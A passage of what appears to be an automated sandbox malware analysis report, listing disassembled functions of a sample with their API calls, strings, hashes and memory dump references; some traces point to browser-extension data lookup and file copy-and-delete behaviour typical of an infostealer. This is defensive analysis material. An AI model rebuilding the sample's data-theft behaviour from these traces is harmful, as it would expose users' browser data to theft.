lstrlenA.KERNEL32(00000000,?,00409F71,00000000,00974110), ref: 00419437
wsprintfA.USER32 ref: 00419457

Strings

%s%s, xrefs: 00419445

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction ID: 36a1aade9beab669742e698a5986ef2a8e6d9b7fa0e45cca69d8a80143706e49
Opcode Fuzzy Hash: 84a337f0fca5bdf22d9977d595415c9580f1c6ff8586b832ae243cfd604c2dbf
Instruction Fuzzy Hash: 9B011E75A18108FFCB04DFA8DD54EAE7B79EF48304F108249F9098B340EB31AA40DB96

Function 0041CA72 Relevance: 7.5, APIs: 5, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 0041CA7E

Part of subcall function 0041C2A0: __getptd_noexit.LIBCMT ref: 0041C2A3
Part of subcall function 0041C2A0: __amsg_exit.LIBCMT ref: 0041C2B0

__getptd.LIBCMT ref: 0041CA95
__amsg_exit.LIBCMT ref: 0041CAA3
__lock.LIBCMT ref: 0041CAB3
__updatetlocinfoEx_nolock.LIBCMT ref: 0041CAC7

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: __amsg_exit__getptd$Ex_nolock__getptd_noexit__lock__updatetlocinfo
String ID:
API String ID: 938513278-0
Opcode ID: e1c6badfeacfa20afd93dab5a2b3e5961ef45d04078cbebb43daf6c602d2eecf
Instruction ID: 3f7fe6514f949f75c5091ac4188df1b21daf88bb75e36ed85571065e92ff899f
Opcode Fuzzy Hash: e1c6badfeacfa20afd93dab5a2b3e5961ef45d04078cbebb43daf6c602d2eecf
Instruction Fuzzy Hash: 10F06231A842189BD622FBA95C867DE33A0AF00758F50014FE405562D2CB7C59C186DE

Function 004168D0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 00416903

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

ShellExecuteEx.SHELL32(0000003C), ref: 004169C6
ExitProcess.KERNEL32 ref: 004169F5

Strings

<, xrefs: 00416979

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: f8448182c22cce2378c378dd1cd2a8c25681252e273e45d8bc4dcec85645523b
Instruction ID: 69e214fcc2f82cbe4d830bf51364f862e1744f727ac50a07542482e63681b1c7
Opcode Fuzzy Hash: f8448182c22cce2378c378dd1cd2a8c25681252e273e45d8bc4dcec85645523b
Instruction Fuzzy Hash: 82313AB1902218ABDB14EB91DC92FDEB779AF08314F40418EF20566191DF787B88CF69

Function 61E01440 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 25libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32 ref: 61E01456
GetProcAddress.KERNEL32 ref: 61E01471

Strings

libgcj-16.dll, xrefs: 61E0144F
_Jv_RegisterClasses, xrefs: 61E01466

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: _Jv_RegisterClasses$libgcj-16.dll
API String ID: 1646373207-328863460
Opcode ID: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
Instruction ID: ecefe885db533eab1004145bf0edfd2de441c317d2227bbbfd891c436449bb9f
Opcode Fuzzy Hash: 659acb1d45e1fe859de50aa712dc5e6a1f27a03cf8697e99cf940ea6467707a5
Instruction Fuzzy Hash: CBE06DB4914B029BEB017FF4850633EBAF5AFC570AF72C42CD4808A290EA30C4818763

Function 00418EE0 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,004196AE,00000000), ref: 00418EEB
HeapAlloc.KERNEL32(00000000,?,?,004196AE,00000000), ref: 00418EF2
wsprintfW.USER32 ref: 00418F08

Strings

%hs, xrefs: 00418EFF

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcesswsprintf
String ID: %hs
API String ID: 659108358-2783943728
Opcode ID: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
Instruction ID: abe7276d6e58fd7f286e9bcc6e4dd5022fdd169b0d4b331efbe0e5b16b2cc016
Opcode Fuzzy Hash: a2d1222b377fc3304f55ce0aa2500adad0c2a2d90715c5043ce73364ad1d5f17
Instruction Fuzzy Hash: 47E08C70E49308BBDB00DB94ED0AF6D77B8EB44302F000196FD0987340EA719F008B96

Function 61E3720A Relevance: 6.4, APIs: 3, Strings: 1, Instructions: 359COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E373CE
memcmp.MSVCRT ref: 61E37560
memcmp.MSVCRT ref: 61E37690

Strings

0, xrefs: 61E3767C

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: memcmp
String ID: 0
API String ID: 1475443563-4108050209
Opcode ID: 7fdc829c56b0d73d757a58cb71872ab273c961bf249caa9fc6ea8f3c5a1c35e8
Instruction ID: 3f20ce3ba2961136da7f3248cde08971803f4c449cb9daae0617fd169a942f67
Opcode Fuzzy Hash: 7fdc829c56b0d73d757a58cb71872ab273c961bf249caa9fc6ea8f3c5a1c35e8
Instruction Fuzzy Hash: 6CE112B0E04269CBDB41CFA8C99078DBBF1BF89318F258569D859AB345D734E886CF41

Function 61E40BB5 Relevance: 6.4, APIs: 5, Instructions: 106COMMON

Download Yara Rule

APIs

memcmp.MSVCRT ref: 61E40C37
memcmp.MSVCRT ref: 61E40C5C
memcmp.MSVCRT ref: 61E40C86
memcmp.MSVCRT ref: 61E40CB5
memcmp.MSVCRT ref: 61E40CE1

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: memcmp
String ID:
API String ID: 1475443563-0
Opcode ID: 8cc521fb16cdd100886a572f5b312f8a70bae0a598922c27761b03018ed4fb84
Instruction ID: fd79a925e1d847c1357e69ee8e74f21d123acc92255d85b94bee504056160bb0
Opcode Fuzzy Hash: 8cc521fb16cdd100886a572f5b312f8a70bae0a598922c27761b03018ed4fb84
Instruction Fuzzy Hash: C0414EB0A083058BE7049FA9D68439EBAF5EFD5358F25C83DE898CB384D775D4458B42

Function 61EAAF5A Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 332stringCOMMON

Download Yara Rule

APIs

strcmp.MSVCRT ref: 61EAB012

Part of subcall function 61E0AE03: free.MSVCRT ref: 61E0AE3D

Strings

pcx, xrefs: 61EAAFA8
bua, xrefs: 61EAAFCC
matchinfo, xrefs: 61EAAF5B

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: freestrcmp
String ID: bua$matchinfo$pcx
API String ID: 716601943-237985100
Opcode ID: 237be79ab2502c4599ed8e0c574142ccb5a6144a58fc15783e185434153a1b49
Instruction ID: d7a9de28f1ba4d9dbc53b777f24a38c05efd697a91aa6da7b783da7e5ea27d52
Opcode Fuzzy Hash: 237be79ab2502c4599ed8e0c574142ccb5a6144a58fc15783e185434153a1b49
Instruction Fuzzy Hash: 2FE1EE74D043598FEB10CFA8C480B9DBBF1BB49318F64C46AE8A8AB351D775E985CB41

Function 61E3D021 Relevance: 6.3, APIs: 1, Strings: 3, Instructions: 293stringCOMMON

Download Yara Rule

APIs

strncmp.MSVCRT ref: 61E3D129

Strings

], xrefs: 61E3D302
#, xrefs: 61E3D24E
-, xrefs: 61E3D2AF

Memory Dump Source

Source File: 00000000.00000002.2106324617.0000000061E01000.00000020.00001000.00020000.00000000.sdmp, Offset: 61E00000, based on PE: true

Associated: 00000000.00000002.2106308617.0000000061E00000.00000040.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106378960.0000000061EB4000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106395343.0000000061EB7000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106415045.0000000061ECC000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106431236.0000000061ECD000.00000002.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED0000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106446710.0000000061ED3000.00000004.00001000.00020000.00000000.sdmpDownload File
Associated: 00000000.00000002.2106481945.0000000061ED4000.00000002.00001000.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_61e00000_b4s45TboUL.jbxd

Similarity

API ID: strncmp
String ID: #$-$]
API String ID: 1114863663-3149169660
Opcode ID: f99a3957d435e7ea3bb32a2a14cb1bf4f5c1a1f05ad08d6a5497aa7015d5eb71
Instruction ID: 1c490b0b60c0b5d90f91e160a7bf365b8f8ab346ded86ed4ccdc7e106188df17
Opcode Fuzzy Hash: f99a3957d435e7ea3bb32a2a14cb1bf4f5c1a1f05ad08d6a5497aa7015d5eb71
Instruction Fuzzy Hash: 82D15774D082698BDB01CF98C18479DFBF2BF89748FA9C059D854AB292D335E986CF50

Function 0040D500 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D581
lstrlenA.KERNEL32(00000000), ref: 0040D798
lstrlenA.KERNEL32(00000000), ref: 0040D7AC
DeleteFileA.KERNEL32(00000000), ref: 0040D82B

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: a57b739fca8736a52b6abc5035b419aee29f1535ce02e9d43ebcf486e1eae90b
Instruction ID: cd95120e3309aa2a4ee5e09d67847ecab6e8b781cb92854c7d2ac691bd2160a2
Opcode Fuzzy Hash: a57b739fca8736a52b6abc5035b419aee29f1535ce02e9d43ebcf486e1eae90b
Instruction Fuzzy Hash: CF911672E111089BCB04FBA1EC66DEE7339AF14314F50456EF11672095EF387A98CB6A

Function 0040D880 Relevance: 6.2, APIs: 4, Instructions: 221filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 00418CF0: GetSystemTime.KERNEL32(?,00976A20,004205B6,?,?,?,?,?,?,?,?,?,004049B3,?,00000014), ref: 00418D16

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0040D901
lstrlenA.KERNEL32(00000000), ref: 0040DA9F
lstrlenA.KERNEL32(00000000), ref: 0040DAB3
DeleteFileA.KERNEL32(00000000), ref: 0040DB32

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: b9a6f4e3650b399750430d183178cababab4e2f4d8e321632e4537772c0efa5f
Instruction ID: 660f6b77f2ff2b442eb80c9f7963c7c0f8ff679996332a2a68bd7dee448c32b7
Opcode Fuzzy Hash: b9a6f4e3650b399750430d183178cababab4e2f4d8e321632e4537772c0efa5f
Instruction Fuzzy Hash: 28812572E111089BCB04FBA5EC66DEE7339AF14314F40455FF10662095EF387A98CB6A

Function 0040F5A0 Relevance: 6.2, APIs: 2, Strings: 2, Instructions: 154stringCOMMON

Download Yara Rule

APIs

Part of subcall function 0041AAB0: lstrcpy.KERNEL32(?,00000000), ref: 0041AAF6

Part of subcall function 0040A110: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 0040A13C
Part of subcall function 0040A110: GetFileSizeEx.KERNEL32(000000FF,?), ref: 0040A161
Part of subcall function 0040A110: LocalAlloc.KERNEL32(00000040,?), ref: 0040A181
Part of subcall function 0040A110: ReadFile.KERNEL32(000000FF,?,00000000,00410447,00000000), ref: 0040A1AA
Part of subcall function 0040A110: LocalFree.KERNEL32(00410447), ref: 0040A1E0
Part of subcall function 0040A110: CloseHandle.KERNEL32(000000FF), ref: 0040A1EA

Part of subcall function 00418FC0: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00418FE2

Part of subcall function 0041AA50: lstrcpy.KERNEL32(00420AF3,00000000), ref: 0041AA98

Part of subcall function 0041ACC0: lstrlenA.KERNEL32(?,004210F8,?,00000000,00420AF3), ref: 0041ACD5
Part of subcall function 0041ACC0: lstrcpy.KERNEL32(00000000), ref: 0041AD14
Part of subcall function 0041ACC0: lstrcatA.KERNEL32(00000000,00000000), ref: 0041AD22

Part of subcall function 0041ABB0: lstrcpy.KERNEL32(?,00420AF3), ref: 0041AC15

Part of subcall function 0041AC30: lstrcpy.KERNEL32(00000000,?), ref: 0041AC82
Part of subcall function 0041AC30: lstrcatA.KERNEL32(00000000), ref: 0041AC92

StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00421678,00420D93), ref: 0040F64C
lstrlenA.KERNEL32(00000000), ref: 0040F66B

Strings

^userContextId=4294967295, xrefs: 0040F69C
moz-extension+++, xrefs: 0040F6AD

Memory Dump Source

Source File: 00000000.00000002.2089509102.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2089509102.00000000004E6000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000514000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000053D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000549000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000056E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000057B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.000000000059B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005A7000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000005AA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000631000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000651000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.0000000000657000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2089509102.00000000006E8000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_b4s45TboUL.jbxd

Yara matches

Similarity

